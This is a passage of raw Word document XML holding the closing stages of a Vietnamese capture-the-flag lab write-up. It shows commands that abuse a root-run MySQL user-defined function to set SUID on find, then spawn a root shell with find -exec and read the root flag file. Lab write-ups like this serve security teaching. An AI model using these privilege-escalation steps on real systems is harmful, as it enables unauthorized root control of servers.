        <w:t>select do_system('chmod u+s /usr/bin/find');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD6CE5D" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B79C40" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t xml:space="preserve">Giải thích: Quá trình này khai thác việc dịch vụ MySQL đang được cấu hình chạy dưới quyền cao nhất (Root). Các lệnh trên sẽ tạo một bảng tạm để nạp thư viện 1518.so vào thư mục plugin của hệ thống cơ sở dữ liệu. Sau đó, nó tạo một hàm tùy chỉnh (do_system) và gọi hàm này để buộc hệ thống thực thi lệnh chmod u+s /usr/bin/find. Kết quả là tệp thực thi find được gắn cờ SUID, cho phép bất kỳ ai chạy nó cũng có quyền tương đương Root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9646C" w14:textId="12079830" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00C74E30" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48661B57" wp14:editId="5F37A434">
            <wp:extent cx="5943600" cy="3947795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17417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6408" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3947795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Giai đoạn: Chiếm quyền Root và Thu thập Cờ (Root Access &amp; Capture The Flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE409A" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Lợi dụng quyền SUID vừa tạo để mở Shell quản trị viên (Root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A7958" w14:textId="5D289490" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDD7EB" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00C74E30" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74E30">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>touch pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44813FFE" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00C74E30" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74E30">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>find pwned -exec "whoami" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D80C326" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00C74E30" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74E30">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>find pwned -exec "/bin/sh" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB5468" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Tạo một tệp rỗng tên pwned để làm đối số kích hoạt lệnh find. Nhờ vào đặc quyền SUID đã được cấp ở bước trước, khi ta gọi tham số -exec, lệnh kiểm tra người dùng whoami và lệnh mở shell /bin/sh sẽ được chạy dưới quyền của chủ sở hữu tệp find (chính là Root). Kẻ tấn công lúc này đã hoàn toàn làm chủ máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E313A34" w14:textId="2B65650E" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00C74E30" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE286C7" wp14:editId="0992B266">
            <wp:extent cx="5943600" cy="3015615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18277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52419" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3015615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Xác nhận quyền Root và thu thập bằng chứng (Flag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3422B" w14:textId="0799F382" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E356C" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00C74E30" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74E30">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C746D38" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00C74E30" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74E30">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EAFEB" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Di chuyển vào thư mục /root (vốn chỉ có tài khoản Root mới có quyền truy cập) và đọc nội dung tệp cờ flag4.txt. Đây là bước cuối cùng kết thúc kịch bản tấn công, minh chứng việc khai thác hệ thống và leo thang đặc quyền đã hoàn tất thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C6B39" w14:textId="4261757B" w:rsidR="00D72ED2" w:rsidRDefault="00C74E30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FE4C9C0" wp14:editId="2B32E5A3">
            <wp:extent cx="5943600" cy="4157345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="204438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89363" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4157345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D72E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D7B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A76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75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D2"/>
    <w:rsid w:val="00022668"/>
    <w:rsid w:val="00242421"/>
    <w:rsid w:val="00355F9B"/>
    <w:rsid w:val="00783CE0"/>
    <w:rsid w:val="008A4638"/>
    <w:rsid w:val="00935252"/>
    <w:rsid w:val="00A456AB"/>
    <w:rsid w:val="00AD443C"/>
    <w:rsid w:val="00C74E30"/>
    <w:rsid w:val="00D076D3"/>
    <w:rsid w:val="00D72ED2"/>
    <w:rsid w:val="00EC7ACC"/>
    <w:rsid w:val="00ED562C"/>
    <w:rsid w:val="00FB5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1BA1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EA5AC3BF-ABB7-4AE7-90C6-0C1435CB1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D2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D7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D2"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D72ED2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D72ED2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D72ED2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D7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ED2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D72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15</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Duc 20230247P</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tran Manh Duc 20230247P</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-13T02:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-13T09:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>